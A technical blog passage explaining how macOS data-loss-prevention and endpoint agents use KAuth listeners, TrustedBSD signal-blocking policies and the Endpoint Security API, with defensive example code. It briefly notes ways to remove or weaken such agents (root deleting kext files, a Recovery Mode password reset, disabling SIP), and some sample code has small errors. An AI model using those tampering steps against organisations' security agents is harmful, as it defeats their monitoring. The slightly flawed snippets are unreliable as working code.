<p>The last part is what we are interested in. Kernel Extensions (kexts) on macOS are akin to drivers in Windows, extending the functionality of the macOS kernel. This is what usually endpoint security vendors rely on to hook the kernel for security events, specifically they use the Kernel Authorization KPI (KAuth KPI). The KAuth KPI provides a mechanism for kernel extensions to perform authorization checks and enforce security policies for various kernel operations. It allows kernel extensions to register callbacks for specific scopes and actions, and intervene in the authorization process.</p>
<h3 id="heading-kernel-extensions-and-kauth-kpi">Kernel Extensions and KAuth KPI</h3>
<p>The KAuth KPI organizes operations into different scopes, each representing an area of interest for authorization. Some common scopes include:</p>
<ul>
<li><p><code>KAUTH_SCOPE_VNODE</code>: Covers operations on file-like objects (vnodes) such as executing, reading, writing, or deleting files.</p>
</li>
<li><p><code>KAUTH_SCOPE_FILEOP</code>: Provides advisory notifications for file system operations, useful for logging or cache invalidation.</p>
</li>
<li><p><code>KAUTH_SCOPE_PROCESS</code>: Relates to process management operations like forking, executing, or tracing processes.</p>
</li>
</ul>
<p>Within each scope, there are specific actions that your kernel extension can monitor and authorize. For example, within the <code>KAUTH_SCOPE_VNODE</code> scope, the <code>KAUTH_VNODE_EXECUTE</code> action represents the execution of a file.</p>
<p>To use the KAuth KPI, your kernel extension needs to register a listener callback for the desired scope and action.</p>
<pre><code class="lang-cpp"><span class="hljs-function"><span class="hljs-keyword">kern_return_t</span> <span class="hljs-title">RegisterListener</span><span class="hljs-params">()</span> </span>{
    vnode_listener_ = kauth_listen_scope(
        KAUTH_SCOPE_VNODE, vnode_scope_callback, <span class="hljs-keyword">reinterpret_cast</span>&lt;<span class="hljs-keyword">void</span> *&gt;(<span class="hljs-keyword">this</span>));
    <span class="hljs-keyword">if</span> (!vnode_listener_) <span class="hljs-keyword">return</span> kIOReturnInternalError;
    <span class="hljs-keyword">return</span> kIOReturnSuccess;
}
</code></pre>
<p>The <code>kauth_listen_scope</code> function registers a callback function (<code>vnode_scope_callback</code> in this example) for the specified scope (<code>KAUTH_SCOPE_VNODE</code>). The third argument is a cookie that will be passed to the callback function, allowing you to associate it with your kernel extension's context.</p>
<p>The listener callback function is where you can inspect the operation being performed and make an authorization decision.</p>
<pre><code class="lang-cpp"><span class="hljs-keyword">extern</span> <span class="hljs-string">"C"</span> <span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">vnode_scope_callback</span><span class="hljs-params">(
    <span class="hljs-keyword">kauth_cred_t</span> credential, <span class="hljs-keyword">void</span> *cookie, <span class="hljs-keyword">kauth_action_t</span> action,
    <span class="hljs-keyword">uintptr_t</span> arg0, <span class="hljs-keyword">uintptr_t</span> arg1, <span class="hljs-keyword">uintptr_t</span> arg2, <span class="hljs-keyword">uintptr_t</span> arg3)</span> </span>{

    <span class="hljs-comment">// check if the action is KAUTH_VNODE_EXECUTE</span>
    <span class="hljs-keyword">if</span> ((action &amp; KAUTH_VNODE_EXECUTE) &amp;&amp; !(action &amp; KAUTH_VNODE_ACCESS)) {
        <span class="hljs-comment">// retrieve the vnode and VFS context from the arguments</span>
        <span class="hljs-keyword">vnode_t</span> vp = <span class="hljs-keyword">reinterpret_cast</span>&lt;<span class="hljs-keyword">vnode_t</span>&gt;(arg1);
        <span class="hljs-keyword">vfs_context_t</span> context = <span class="hljs-keyword">reinterpret_cast</span>&lt;<span class="hljs-keyword">vfs_context_t</span>&gt;(arg0);

        <span class="hljs-comment">// perform authorization check</span>
        <span class="hljs-keyword">int</span> result = AuthorizeFileExecution(credential, context, vp);

        <span class="hljs-keyword">return</span> result;
    }

    <span class="hljs-comment">// defer to other listeners for actions we don't handle</span>
    <span class="hljs-keyword">return</span> KAUTH_RESULT_DEFER;
}
</code></pre>
<p>In this example, the callback function checks if the action is <code>KAUTH_VNODE_EXECUTE</code>. If it is, it retrieves the vnode and VFS context from the arguments (<code>arg1</code> and <code>arg0</code>, respectively). It then calls a <code>AuthorizeFileExecution</code> function to perform the authorization check based on the provided credentials, context, and vnode. The result of this authorization check is returned to the KAuth KPI.</p>
<p>If the action is not <code>KAUTH_VNODE_EXECUTE</code>, the callback function returns <code>KAUTH_RESULT_DEFER</code>, deferring the authorization decision to other registered listeners or the default BSD permission model. The listener callback function needs to return one of the following values to the KAuth KPI, indicating the authorization decision:</p>
<ul>
<li><p><code>KAUTH_RESULT_ALLOW</code>: Allow the operation to proceed.</p>
</li>
<li><p><code>KAUTH_RESULT_DENY</code>: Deny the operation and prevent it from happening.</p>
</li>
<li><p><code>KAUTH_RESULT_DEFER</code>: Defer the decision to other registered listeners or the default BSD permission model.</p>
</li>
</ul>
<p>The decision-making logic for authorizing an operation can be as simple or complex as needed, depending on your security requirements. It could involve checking file signatures, consulting a whitelist or blacklist, or performing more advanced policy evaluations.</p>
<p>We can pretty quickly gather what a kext is doing by inspecting its properties list file (plist).</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// info.plist for one kext of a market-leading DLP provider</span>
<span class="hljs-comment">// some lines are edited for clarity</span>
    &lt;key&gt;OSBundleLibraries&lt;/key&gt;
    &lt;dict&gt;
        &lt;key&gt;com.apple.kpi.bsd&lt;/key&gt;
        &lt;<span class="hljs-built_in">string</span>&gt;<span class="hljs-number">10.0</span><span class="hljs-number">.0</span>&lt;/<span class="hljs-built_in">string</span>&gt;
        &lt;key&gt;com.apple.kpi.iokit&lt;/key&gt;
        &lt;<span class="hljs-built_in">string</span>&gt;<span class="hljs-number">10.0</span><span class="hljs-number">.0</span>&lt;/<span class="hljs-built_in">string</span>&gt;
        &lt;key&gt;com.apple.kpi.libkern&lt;/key&gt;
        &lt;<span class="hljs-built_in">string</span>&gt;<span class="hljs-number">10.0</span><span class="hljs-number">.0</span>&lt;/<span class="hljs-built_in">string</span>&gt;
        &lt;key&gt;com.apple.kpi.mach&lt;/key&gt;
        &lt;<span class="hljs-built_in">string</span>&gt;<span class="hljs-number">10.0</span><span class="hljs-number">.0</span>&lt;/<span class="hljs-built_in">string</span>&gt;
        &lt;key&gt;com.product.endpoint.process&lt;/key&gt;
        &lt;<span class="hljs-built_in">string</span>&gt;<span class="hljs-number">1.0</span><span class="hljs-number">.0</span>&lt;/<span class="hljs-built_in">string</span>&gt;
    &lt;/dict&gt;
</code></pre>
<p>At a high level, main DLP component launches and connects to its kernel extension. Then the kernel extension uses a number of other kernel extensions to perform certain operations :</p>
<ul>
<li><p><code>com.apple.kpi.libkern</code> is a foundational library commonly used in the development of kernel extensions, which offers a base for creating and manipulating kexts.</p>
</li>
<li><p><code>com.apple.kpi.bsd</code> which is used to access the BSD subsystem inside XNU to monitor intercept file operations, network communications, or process activities to prevent unauthorized data exfiltration</p>
</li>
<li><p><code>com.apple.kpi.mach</code> which is used to access the Mach subsystem inside XNU to monitor for in-memory execution and unauthorized threads</p>
</li>
<li><p><code>com.apple.kpi.iokit</code> which is used to monitor external device connections (e.g., USB drives) or network interfaces, enabling the extension to block or audit data transfers that could lead to data loss</p>
</li>
</ul>
<p>Lets say a user invokes a command to copy a file, such as using <code>cp</code> in zsh, the command triggers file-system operations that are handled by the Virtual File System (VFS). KAuth listeners that are registered for file operations (VNODE scope) will receive notifications of the read and write requests. The <code>kauth_action_t</code> will correspond to the file operations such as <code>KAUTH_VNODE_READ_DATA</code> for reading from the source file and <code>KAUTH_VNODE_WRITE_DATA</code> for writing to the destination.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// NOTE : This code is heavily edited for readibility</span>
<span class="hljs-comment">// the callback function for vnode scope events</span>
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">int</span> <span class="hljs-title">Listener</span><span class="hljs-params">(
    <span class="hljs-keyword">kauth_cred_t</span>   credential,
    <span class="hljs-keyword">void</span> *         idata,
    <span class="hljs-keyword">kauth_action_t</span> action,
    <span class="hljs-keyword">uintptr_t</span>      arg0,
    <span class="hljs-keyword">uintptr_t</span>      arg1,
    <span class="hljs-keyword">uintptr_t</span>      arg2,
    <span class="hljs-keyword">uintptr_t</span>      arg3)</span> </span>{

    <span class="hljs-comment">// create human-readable paths and actions</span>
    err = CreateVnodePath(vp, &amp;vpPath);
    err = CreateVnodePath((<span class="hljs-keyword">vnode_t</span>)arg1, &amp;dvpPath);
    err = CreateVnodeActionString(action, vnode_isdir(vp), &amp;actionStr, &amp;actionStrBufSize);

    <span class="hljs-comment">// refer to DLP Policy</span>
    <span class="hljs-keyword">char</span> *dlpPolicy = <span class="hljs-literal">NULL</span>;
    <span class="hljs-keyword">if</span> (getPolicy(&amp;dlpPolicy) == <span class="hljs-number">0</span> &amp;&amp; dlpPolicy != <span class="hljs-literal">NULL</span>) {
        <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strcmp</span>(vpPath, dlpPolicy) == <span class="hljs-number">0</span> &amp;&amp; (action &amp; KAUTH_VNODE_WRITE_DATA)) {
            <span class="hljs-comment">// deny operation</span>
            result = KAUTH_RESULT_DENY;
        }
    }

    <span class="hljs-keyword">if</span> (vnode_isdir(vp) &amp;&amp; (action &amp; KAUTH_VNODE_ADD_FILE)) {
        <span class="hljs-comment">// allow peration</span>
        result = KAUTH_RESULT_ALLOW;
    }

    <span class="hljs-keyword">return</span> result;
}
</code></pre>
<p>The security product receives these events and then forwards it to the agent policy holder, which finally decides whether to allow <code>KAUTH_RESULT_ALLOW</code>, deny <code>KAUTH_RESULT_DENY</code>, or defer to another listener <code>KAUTH_RESULT_DEFER</code> for a decision (this is used when there is another product tacked onto the DLP that has additional policies in addition to the main DLP agent policy.</p>
<p>This is common as many endpoint security products bundle <a target="_blank" href="https://help.forcepoint.com/fpone/deploy/rhtml/fd6c40aa-2587-4950-b33a-ecd3e47d93e1.html">additional features</a> or <a target="_blank" href="https://www.dtexsystems.com/intercept-platform/dtex-intercept-for-crowdstrike-falcon/">alternative products</a> under one agent, which usually boil down to additional rulesets. For example, an additional check might be done by calling an alternative <code>kext</code>.</p>
<pre><code class="lang-cpp"><span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">int</span> <span class="hljs-title">Listener</span><span class="hljs-params">(
    <span class="hljs-keyword">kauth_cred_t</span>   credential,
    <span class="hljs-keyword">void</span> *         idata,
    <span class="hljs-keyword">kauth_action_t</span> action,
    <span class="hljs-keyword">uintptr_t</span>      arg0,
    <span class="hljs-keyword">uintptr_t</span>      arg1,
    <span class="hljs-keyword">uintptr_t</span>      arg2,
    <span class="hljs-keyword">uintptr_t</span>      arg3)</span> </span>{

    <span class="hljs-comment">// ... (previous code) ...</span>

    <span class="hljs-keyword">if</span> (result == KAUTH_RESULT_DEFER) {
        <span class="hljs-comment">// call alternative kext to handle additional policy checks</span>
        result = CheckPolicy(credential, idata, action, arg0, arg1, arg2, arg3);
    }

    <span class="hljs-keyword">return</span> result;
}
</code></pre>
<h3 id="heading-process-protections-through-trustedbsd">Process Protections Through TrustedBSD</h3>
<p>While uninstalling endpoint security agents like DLPs and EDRs usually require a key generated from the master console, a user with root access to the system can simply remove the kext files and completely uninstall the agent. While removing admin access from the device can prove useful, users can still reset the password for a locked admin account by using Recovery Mode in macOS by using the <code>resetpassword</code> utility in the terminal provided.</p>
<p>This is where process protection kexts enters the picture. This starts with the <a target="_blank" href="https://web.archive.org/web/20190616195406/https://developer.apple.com/documentation/kernel/mac_policy_h"><code>mac_policy_register</code></a> function, which is part of the TrustedBSD Mandatory Access Control (MAC) framework. This works similarly to how <a target="_blank" href="https://www.redhat.com/en/topics/linux/what-is-selinux">SELinux</a> locks down certain linux processes and files from tampering.</p>
<p>TrustedBSD itself was introduced in Mac OS X 10.5. and is used by Apple to isolate applications from interacting with user-controlled objects. While the implementation of the sandbox isn't designed to protect an application from user tampering, many security vendors use it to do just that.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// callback function to handle process signal events</span>
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">int</span> <span class="hljs-title">mpo_proc_check_signal_callback</span><span class="hljs-params">(<span class="hljs-keyword">kauth_cred_t</span> cred, struct proc *p, <span class="hljs-keyword">int</span> signum)</span> </span>{
    <span class="hljs-keyword">char</span> procName[MAXCOMLEN + <span class="hljs-number">1</span>];
    proc_selfname(procName, <span class="hljs-keyword">sizeof</span>(procName));

    <span class="hljs-comment">// check if the process being signaled is your DLP application</span>
    <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strcmp</span>(procName, <span class="hljs-string">"com.company.endpoint.dlp"</span>) == <span class="hljs-number">0</span>) {
        <span class="hljs-comment">// block the signal if it's a termination signal (e.g., SIGTERM, SIGKILL)</span>
        <span class="hljs-keyword">if</span> (signum == SIGTERM || signum == SIGKILL) {
            <span class="hljs-keyword">return</span> EPERM; <span class="hljs-comment">// deny the signal</span>
        }
    }

    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>; <span class="hljs-comment">// allow the signal</span>
}

<span class="hljs-comment">// struct to hold the callback function pointers</span>
<span class="hljs-keyword">static</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">mac_policy_ops</span> <span class="hljs-title">mac_ops</span> = {</span>
    .mpo_proc_check_signal = mpo_proc_check_signal_callback,
    <span class="hljs-comment">// add other callback functions as needed</span>
};

<span class="hljs-comment">// struct to configure the policy</span>
<span class="hljs-keyword">static</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">mac_policy_conf</span> <span class="hljs-title">mac_policy_conf</span> = {</span>
    .mpc_name = <span class="hljs-string">"com.company.endpoint.dlp"</span>,
    .mpc_labelname_count = <span class="hljs-number">0</span>,
    .mpc_ops = &amp;mac_ops,
    .mpc_loadtime_flags = <span class="hljs-number">0</span>, <span class="hljs-comment">// make the policy non-unloadable</span>
    .mpc_field_off = <span class="hljs-literal">NULL</span>,
    .mpc_runtime_flags = <span class="hljs-number">0</span>
};

<span class="hljs-comment">// register the policy during kext initialization</span>
<span class="hljs-function"><span class="hljs-keyword">kern_return_t</span> <span class="hljs-title">DLPProtectKext_start</span><span class="hljs-params">(<span class="hljs-keyword">kmod_info_t</span> *ki, <span class="hljs-keyword">void</span> *d)</span> </span>{
    <span class="hljs-keyword">mac_policy_handle_t</span> handle;
    <span class="hljs-keyword">int</span> error = mac_policy_register(&amp;mac_policy_conf, &amp;handle, d);
    <span class="hljs-keyword">if</span> (error != <span class="hljs-number">0</span>) {
        <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Failed to register DLP protection policy\n"</span>);
        <span class="hljs-keyword">return</span> KERN_FAILURE;
    }

    <span class="hljs-keyword">return</span> KERN_SUCCESS;
}
</code></pre>
<p>In this example, the <code>mpo_proc_check_signal_callback</code> function checks if the process being signaled is your DLP application (<code>com.mycompany.dlp</code>). If it is, and the signal is a termination signal (<code>SIGTERM</code> or <code>SIGKILL</code>), the function returns <code>EPERM</code> to deny the signal. Otherwise, it allows the signal by returning <code>0</code>.</p>
<p>The <code>mac_ops</code> struct holds the callback function pointer, and the <code>mac_policy_conf</code> struct configures the policy with a name, description, and the <code>mac_ops</code> struct.</p>
<p>During the kernel extension's initialization (<code>DLPProtectKext_start</code>), the policy is registered with the TrustedBSD framework using <code>mac_policy_register</code>. The <code>mpc_loadtime_flags</code> field is set to <code>0</code> to make the policy non-unloadable.</p>
<p>You can also utilize kexts to monitor for the PIDs dynamically by performing a bitwise operation on the signal number (<code>SIGTERM</code>/<code>SIGKILL</code>) and checks against a mask. It then checks if the calling process or the target process is the PID belonging to the protected process.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// callback function to handle process signal events</span>
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">int</span> <span class="hljs-title">mpo_proc_check_signal_callback</span><span class="hljs-params">(<span class="hljs-keyword">kauth_cred_t</span> cred, struct proc *p, <span class="hljs-keyword">int</span> signum)</span> </span>{
    <span class="hljs-keyword">pid_t</span> calling_pid = proc_selfpid();
    <span class="hljs-keyword">pid_t</span> target_pid = proc_pid(p);

    <span class="hljs-comment">// check if the calling process or the target process is a trusted PID</span>
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; num_trusted_pids; i++) {
        <span class="hljs-keyword">if</span> (calling_pid == trusted_pids[i] || target_pid == trusted_pids[i]) {
            <span class="hljs-comment">// block the signal if it's a termination signal (e.g., SIGTERM, SIGKILL)</span>
            <span class="hljs-keyword">if</span> (signum == SIGTERM || signum == SIGKILL) {
                <span class="hljs-keyword">return</span> EPERM; <span class="hljs-comment">// deny the signal</span>
            }
        }
    }

    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>; <span class="hljs-comment">// allow the signal</span>
}

<span class="hljs-comment">// struct to hold the callback function pointers</span>
<span class="hljs-keyword">static</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">mac_policy_ops</span> <span class="hljs-title">mac_ops</span> = {</span>
    .mpo_proc_check_signal = mpo_proc_check_signal_callback,
    <span class="hljs-comment">// add other callback functions as needed</span>
};

<span class="hljs-comment">// struct to configure the policy</span>
<span class="hljs-keyword">static</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">mac_policy_conf</span> <span class="hljs-title">mac_policy_conf</span> = {</span>
    .mpc_name = <span class="hljs-string">"com.company.endpoint.dlp"</span>,
    .mpc_labelname_count = <span class="hljs-number">0</span>,
    .mpc_ops = &amp;mac_ops,
    .mpc_loadtime_flags = <span class="hljs-number">0</span>, <span class="hljs-comment">// make the policy non-unloadable</span>
    .mpc_field_off = <span class="hljs-literal">NULL</span>,
    .mpc_runtime_flags = <span class="hljs-number">0</span>
};
</code></pre>
<p>To block the SIGTERM or SIGKILL signal from being delivered to your trusted process, you can modify the <code>mpo_proc_check_signal_callback</code> function to return <a target="_blank" href="https://docs.freebsd.org/en/books/arch-handbook/mac/#mac-access-control-checks"><code>EPERM</code></a> when the signal is detected as a termination signal, and the target process is a trusted PID.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1710769794795/33c996d9-fe98-4c99-ba5a-77e6cac8af4b.png" alt class="image--center mx-auto" /></p>
<p>This is why sometimes if you try to terminate the process of a kext-based security product or try to copy the configuration files in the Library folder, you'll receive an error message despite even having root level privileges. This is probably because there is a secondary agent that monitors and protects the integrity of the process and the binaries related to it, and sends a <code>KAUTH_RESULT_DENY</code> message.</p>
<h3 id="heading-limitations-of-kext-based-security-products">Limitations of Kext-based Security Products</h3>
<p>One of the key issues with kernel extensions is their ability to introduce stability and security problems. Since kexts operate within the kernel, they bypass the usual macOS security mechanisms such as Gatekeeper and System Integrity Protection (SIP). There has also been alot of documented cases of third-party kernel extensions being broken <a target="_blank" href="https://whitehatmac.com/macos-bugs-are-causing-kext-failures/">because of a system update</a> or <a target="_blank" href="https://github.com/intel/haxm/issues/93">causing system instability</a>, this is due to Apple making constant revisions to kernel interfaces which third-party devs may not have clear insight to. The <a target="_blank" href="https://blog.maikxchd.com/analyzing-genshin-impacts-anticheat-module">security risk posed</a> by having usermode agents interact with kernel components have also been documented in Windows.</p>
<p>This is where the previously mentioned Endpoint Security API takes the torch.</p>
<h3 id="heading-implementation-using-endpoint-security-api">Implementation using Endpoint Security API</h3>
<p>The new Apple Endpoint Security (ES) API has largely replaced the KAuth KPI, which now generates a warning at compile time and uses the message <code>__kpi_deprecated("Use EndpointSecurity instead")</code> to warn developers of the impending transitition. Some security vendors for macOS have either <a target="_blank" href="https://www.sentinelone.com/blog/going-kextless-why-we-all-need-to-transition-away-from-kernel-extensions/">already transititioned</a> to the ES API, have <a target="_blank" href="https://www.cyberhaven.com/blog/the-only-day-zero-dlp-solution-available-for-macos-big-sur">built their products</a> around usermode-based security protections since the beginning, or <a target="_blank" href="https://www.forcepoint.com/blog/insights/big-sur-macos-11-update">are still planning</a> to move their legacy kext-based implementations to system extensions.</p>
<p>While in the article before, we know that the ES API can give security products a rich event streams to capture, log, and prevent certain operations through an apple-built kernel extension. But there are also other benefits to being an ES application :</p>
<ul>
<li><p>The process becomes protected by System Integrity Protection (SIP) preventing tampering of the extension and related processes by the user or external threat actors, making third-party security products enjoy the same level of protection as SIP-protected Apple binaries</p>
</li>
<li><p>There is also a greater level of protection for the daemon similar to the protection given to Apple-made system daemons, which means even root users cannot unload your <code>launchd</code> job (similar to Process Protection Light (PPL) processes in Windows)</p>
</li>
<li><p>Your system extension can also launch and setup an event stream before other applications are able to execute (similar to Early Launch Anti-Malware (ELAM) drivers in Windows)</p>
</li>
</ul>
<p>Like the KAuth KPI, the Endpoint Security API allows system extensions to subscribe to specific event types and receive notifications or authorization requests for those events. The system extension can then make decisions to allow or deny the requested operations based on its security policies. Both APIs also provide a callback mechanism for system extensions to receive event notifications and make authorization decisions (but the Endpoint Security API uses a more streamlined callback approach, as we'll see shortly)</p>
<p>One of the main differences between the Endpoint Security API and KAuth KPI is the execution environment. While KAuth operates within the kernel, the Endpoint Security API runs entirely in user space, making it more suitable for modern system extensions that are moving away from the kernel.</p>
<p>Another key difference is the event granularity. The Endpoint Security API provides a more fine-grained set of event types compared to the broad scopes offered by KAuth. This allows for better control over what events a system extension can monitor and authorize.</p>
<p>There are two ways to connect to the ES API, firstly using a launch daemon to act as a regular system scope daemon that will require the process <a target="_blank" href="https://developer.apple.com/documentation/endpointsecurity/es_new_client_result_t/es_new_client_result_err_not_privileged">running as root</a> and also through the building of a system extesion to act as user-space receiver kernel extension (via <code>EndpointSecurity.kext</code>).</p>
<p>Building your product as a system scope daemon is ideal for analysis and research tools (similar to Sysmon on Windows) as users don't need to deal with the system extension installation process and can connect immediately to the event stream. Building your product as a system extension is ideal for endpoint security products, that might enjoy the protections given by SIP to defend from potential tampering and also allows the extension to setup an event stream before other applications are active.</p>
<p>While subscribing to ES events is not difficult programmatically, ES is considered a <a target="_blank" href="https://developer.apple.com/help/account/reference/provisioning-with-managed-capabilities/">managed capability</a> in macOS. This means that to start building an ES application, it requires getting the <code>com.apple.developer.endpoint-security.client</code> entitlement, which requires an entitlement from <a target="_blank" href="https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_developer_endpoint-security_client"><strong>Apple</strong> via</a> the <a target="_blank" href="https://developer.apple.com/contact/request/system-extension/"><strong>Apple Developer System Extensions Request Form</strong>.</a></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1710602941917/1ceeffff-b235-4149-b818-883a2ba60155.png" alt class="image--center mx-auto" /></p>
<p>Once you get the approval for the entitlement, you or your organization can create system extensions and ES-enabled userspace apps freely. However, if you would rather skip this long and expensive process you can also subscribe and run non-entitled ES API applications by <a target="_blank" href="https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection">disabling SIP</a>.</p>
<p>In creating ES apps, its good that <code>EndpointSecurity</code> is offered as a C API its able to be used in alot of memory safe languages such as C/C++, Swift, Objective-C, and Rust. The code below to me is so straightforward and readable compared to the hieroglyphic-like KPI code from above that its ridiculous. This also has the benefit of reducing the possibilities for a memory corruption exploit, which is a top source of exploit in KPI implementations.</p>
<p>To use the Endpoint Security API, a system extension must create an Endpoint Security client and register a callback function.</p>
<pre><code class="lang-cpp"><span class="hljs-keyword">es_client_t</span> *client = <span class="hljs-literal">NULL</span>;
<span class="hljs-keyword">es_new_client_result_t</span> ret = es_new_client(&amp;client,
    ^(<span class="hljs-keyword">es_client_t</span> *c, <span class="hljs-keyword">const</span> <span class="hljs-keyword">es_message_t</span> *m) {
        <span class="hljs-comment">// callback method</span>
        ...
    }
);
</code></pre>
<p>The <code>es_new_client</code> function creates a new Endpoint Security client and takes a block (essentially a lambda function in C) as an argument. This block will be called whenever an event occurs that the client has subscribed to. Once an Endpoint Security client is created, the system extension can subscribe to specific event types it wants to monitor:</p>
<pre><code class="lang-cpp"><span class="hljs-keyword">es_event_type_t</span> events[] = { ES_EVENT_TYPE_AUTH_EXEC, ES_EVENT_TYPE_NOTIFY_EXIT };
<span class="hljs-keyword">es_return_t</span> sret = es_subscribe(self.client, events, <span class="hljs-number">2</span>);
</code></pre>
<p>In this example, the system extension subscribes to the <code>ES_EVENT_TYPE_AUTH_EXEC</code> event type, which represents executable file execution, and <code>ES_EVENT_TYPE_NOTIFY_EXIT</code>, which notifies when a process exits.</p>
<p>When an event occurs that the client has subscribed to, the callback function registered with <code>es_new_client</code> is invoked. The callback function receives a pointer to the client and a pointer to the event message (<code>es_message_t</code>).</p>
<pre><code class="lang-cpp">(<span class="hljs-keyword">es_client_t</span> *c, <span class="hljs-keyword">const</span> <span class="hljs-keyword">es_message_t</span> *m) {
    <span class="hljs-comment">// check the event type</span>
    <span class="hljs-keyword">switch</span> (m-&gt;action_type) {
        <span class="hljs-keyword">case</span> ES_ACTION_TYPE_AUTH:
            <span class="hljs-comment">// handle authorization events</span>
            <span class="hljs-keyword">switch</span> (m-&gt;event_type) {
                <span class="hljs-keyword">case</span> ES_EVENT_TYPE_AUTH_EXEC:
                    <span class="hljs-comment">// handle executable file execution</span>
                    ...
                    <span class="hljs-comment">// respond with the authorization decision</span>
                    es_respond_auth_result(c, m, ES_AUTH_RESULT_ALLOW);
                    <span class="hljs-keyword">break</span>;
                ...
            }
            <span class="hljs-keyword">break</span>;
        <span class="hljs-keyword">case</span> ES_ACTION_TYPE_NOTIFY:
            <span class="hljs-comment">// handle notification events</span>
            <span class="hljs-keyword">switch</span> (m-&gt;event_type) {
                <span class="hljs-keyword">case</span> ES_EVENT_TYPE_NOTIFY_EXIT:
                    <span class="hljs-comment">// handle process exit notification</span>
                    ...
                    <span class="hljs-keyword">break</span>;
                ...
            }
            <span class="hljs-keyword">break</span>;
        ...
    }
}
</code></pre>
<p>The callback function then checks the <code>action_type</code> of the event. If it's an authorization event (<code>ES_ACTION_TYPE_AUTH</code>), the function further inspects the <code>event_type</code> to determine the specific event, such as <code>ES_EVENT_TYPE_AUTH_EXEC</code> for executable file execution.</p>
<p>For authorization events, the system extension can make a decision to allow or deny the operation by calling <code>es_respond_auth_result</code> with the appropriate <code>ES_AUTH_RESULT_ALLOW</code> or <code>ES_AUTH_RESULT_DENY</code> value. For notification events (<code>ES_ACTION_TYPE_NOTIFY</code>), the system extension can perform any necessary actions, such as logging or cache invalidation, but cannot influence the event outcome.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// an example handler to make auth (allow or block) decisions.</span>
<span class="hljs-comment">// returns either ES_AUTH_RESULT_ALLOW or ES_AUTH_RESULT_DENY.</span>
<span class="hljs-function"><span class="hljs-keyword">es_auth_result_t</span> <span class="hljs-title">auth_event_handler</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-keyword">es_message_t</span> *msg)</span> </span>{
    <span class="hljs-keyword">switch</span> (msg-&gt;event_type) {
        <span class="hljs-keyword">case</span> ES_EVENT_TYPE_AUTH_OPEN:
            <span class="hljs-comment">// access the event-specific data from the message union</span>
            <span class="hljs-keyword">const</span> <span class="hljs-keyword">es_event_auth_open_t</span> *openEvent = &amp;msg-&gt;event.auth.open;  
            <span class="hljs-comment">// check if the process is an Endpoint Security client</span>
            <span class="hljs-keyword">if</span> (openEvent-&gt;target-&gt;is_es_client) {
                <span class="hljs-keyword">return</span> ES_AUTH_RESULT_ALLOW;
            }

            <span class="hljs-comment">// get the file path</span>
            <span class="hljs-keyword">char</span> filePath[PATH_MAX];
            strlcpy(filePath, openEvent-&gt;target-&gt;vnode.path, <span class="hljs-keyword">sizeof</span>(filePath));
            <span class="hljs-comment">// check if the process is vim trying to access a text file</span>
            <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strstr</span>(openEvent-&gt;target-&gt;proc.name, <span class="hljs-string">"vim"</span>) &amp;&amp; <span class="hljs-built_in">strstr</span>(filePath, <span class="hljs-string">".txt"</span>)) {
                LOG_IMPORTANT_INFO(<span class="hljs-string">"BLOCKING OPEN: %s"</span>, filePath);
                <span class="hljs-keyword">return</span> ES_AUTH_RESULT_DENY;
            }

            <span class="hljs-comment">// all good</span>
            <span class="hljs-keyword">return</span> ES_AUTH_RESULT_ALLOW;
        <span class="hljs-keyword">default</span>:
            <span class="hljs-keyword">return</span> ES_AUTH_RESULT_ALLOW;
    }
}
</code></pre>
<p>One important aspect of the Endpoint Security API is the requirement to respond to authorization events by a specified deadline. If a system extension fails to respond in time, Apple may terminate the extension. There are a few solutions in the while i've seen to overcome this.</p>
<p>You can set a timer to issue a "deny" response shortly before the deadline in case the main daemon fails to respond in time. The idea is to start a timer when you receive an authorization event. If the timer expires before your authorization logic completes, you automatically send a "deny" response to the Endpoint Security API. This ensures that you always respond before the deadline, preventing Apple from terminating your extension.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// Start a watchdog timer when receiving an auth event</span>
<span class="hljs-keyword">dispatch_source_t</span> timer = dispatch_source_create(DISPATCH_SOURCE_TYPE_TIMER, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, dispatch_get_global_queue(<span class="hljs-number">0</span>, <span class="hljs-number">0</span>));
dispatch_source_set_timer(timer, dispatch_walltime(<span class="hljs-literal">NULL</span>, NSEC_PER_SEC * (deadline - <span class="hljs-number">2</span>)), DISPATCH_TIME_FOREVER, <span class="hljs-number">0</span>);
dispatch_source_set_event_handler(timer, ^{
    <span class="hljs-comment">// Time is up, deny the event</span>
    es_respond_auth_result(client, msg, ES_AUTH_RESULT_DENY);
    dispatch_source_cancel(timer);
});
dispatch_resume(timer);

<span class="hljs-comment">// Run your authorization logic</span>
<span class="hljs-keyword">es_auth_result_t</span> result = auth_event_handler(msg);

<span class="hljs-comment">// If logic completes before the timer, cancel the timer</span>
dispatch_source_cancel(timer);
es_respond_auth_result(client, msg, result);
</code></pre>
<p>Another approach is to perform your authorization logic asynchronously, preferably on a separate thread or queue. This way, your main thread can respond to the Endpoint Security API within the deadline, while the asynchronous task handles the actual authorization decision.</p>
